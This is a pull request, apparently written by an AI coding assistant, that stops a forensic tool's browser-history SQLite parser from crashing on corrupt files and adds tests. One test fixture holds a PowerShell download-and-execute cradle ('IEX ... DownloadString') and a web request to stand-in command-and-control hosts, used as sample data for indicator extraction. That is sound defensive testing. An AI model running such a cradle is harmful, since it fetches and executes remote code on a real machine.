### PR TITLE
Don't crash on corrupt browser-history SQLite files

### DIFF
--- a/tests/test_endpoint_parsers.py
+++ b/tests/test_endpoint_parsers.py
@@ -1,0 +1,60 @@
+import os
+import sqlite3
+
+from titan_decoder.core.endpoint_parsers import (
+    parse_browser_history_sqlite,
+    parse_powershell_history,
+)
+
+
+def test_browser_sqlite_corrupt_is_graceful(tmp_path):
+    # Corrupt / non-SQLite files must degrade to empty, not raise DatabaseError.
+    for name, data in (
+        ("random.sqlite", os.urandom(4000)),
+        ("hdr.sqlite", b"SQLite format 3\x00" + os.urandom(4000)),
+        ("text.sqlite", b"not a database at all\n" * 50),
+        ("empty.sqlite", b""),
+    ):
+        p = tmp_path / name
+        p.write_bytes(data)
+        events, indicators = parse_browser_history_sqlite(p)
+        assert events == []
+        assert indicators == []
+
+
+def test_browser_sqlite_chrome_history(tmp_path):
+    p = tmp_path / "History"
+    conn = sqlite3.connect(str(p))
+    conn.execute("CREATE TABLE urls(url, title, visit_count, last_visit_time)")
+    conn.execute(
+        "INSERT INTO urls VALUES('http://evil.com/x', 't', 5, 13350000000000000)"
+    )
+    conn.commit()
+    conn.close()
+    events, indicators = parse_browser_history_sqlite(p)
+    assert len(events) == 1
+    assert any(i.value == "http://evil.com/x" for i in indicators)
+
+
+def test_browser_sqlite_missing_or_wrong_schema_is_graceful(tmp_path):
+    p = tmp_path / "other.sqlite"
+    conn = sqlite3.connect(str(p))
+    conn.execute("CREATE TABLE urls(x, y)")  # 'urls' table, wrong columns
+    conn.execute("INSERT INTO urls VALUES(1, 2)")
+    conn.commit()
+    conn.close()
+    events, indicators = parse_browser_history_sqlite(p)
+    assert events == [] and indicators == []
+
+
+def test_powershell_history_extracts_iocs(tmp_path):
+    p = tmp_path / "ConsoleHost_history.txt"
+    p.write_text(
+        "whoami\n"
+        "Invoke-WebRequest http://c2.evil.net/a\n"
+        "IEX (New-Object Net.WebClient).DownloadString('http://drop.example.org')\n"
+    )
+    events, indicators = parse_powershell_history(p)
+    assert len(events) == 3
+    urls = {i.value for i in indicators if i.indicator_type == "urls"}
+    assert "http://c2.evil.net/a" in urls

--- a/titan_decoder/core/endpoint_parsers.py
+++ b/titan_decoder/core/endpoint_parsers.py
@@ -229,6 +229,11 @@ def parse_browser_history_sqlite(path: Path) -> Tuple[List[EvidenceEvent], List[
             except Exception:
                 pass
 
+    except Exception:
+        # Corrupt / non-SQLite file: _table_exists (or any query) can raise
+        # DatabaseError. Degrade to empty results like the other parsers rather
+        # than letting it abort the whole evidence run.
+        pass
     finally:
         try:
             conn.close()


### PR DESCRIPTION
## Problem (found while fuzzing the endpoint parsers)

`parse_browser_history_sqlite` wrapped its work in `try: … finally:` with **no `except`**. `sqlite3.connect` is lazy, so a corrupt or non-SQLite file doesn't fail until the first query — and `_table_exists` then raises `sqlite3.DatabaseError: file is not a database`, which **propagated out uncaught** and aborted the whole `--evidence` run (and crashed direct API callers).

Repro — these all raised before the fix:
- random bytes with a `.sqlite` name
- a valid `SQLite format 3\x00` header followed by garbage
- a plain text file passed as a browser DB

Every other parser degrades to empty results on bad input; this one didn't.

## Fix

Add an `except Exception: pass` to the outer block so a bad database yields empty events/indicators instead of raising. Valid Chrome/Firefox history still parses normally.

## Verification
- Corrupt / header+garbage / text / empty SQLite → `([], [])`, no exception (also confirmed through `parse_evidence_file(..., "browser_history")`).
- Valid Chrome history still extracts the URL indicator; wrong-schema `urls` table degrades gracefully.
- New `tests/test_endpoint_parsers.py`; `pytest -q` → **117 passed**; `ruff check .` → clean.

## Also observed (not a crash; noted)
The PowerShell-history parser runs `extract_iocs` per line, so a very large history file is linear-but-heavy (~41 s / 350 MB for 300k lines). PSReadLine history is normally small; this is a perf characteristic, not a defect — flagging as a possible follow-up (e.g. a line cap) if large exports become a use case.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

---
_Generated by [Claude Code](https://claude.ai/code/session_01Cy28YJdZhuddMxF5ZgKW71)_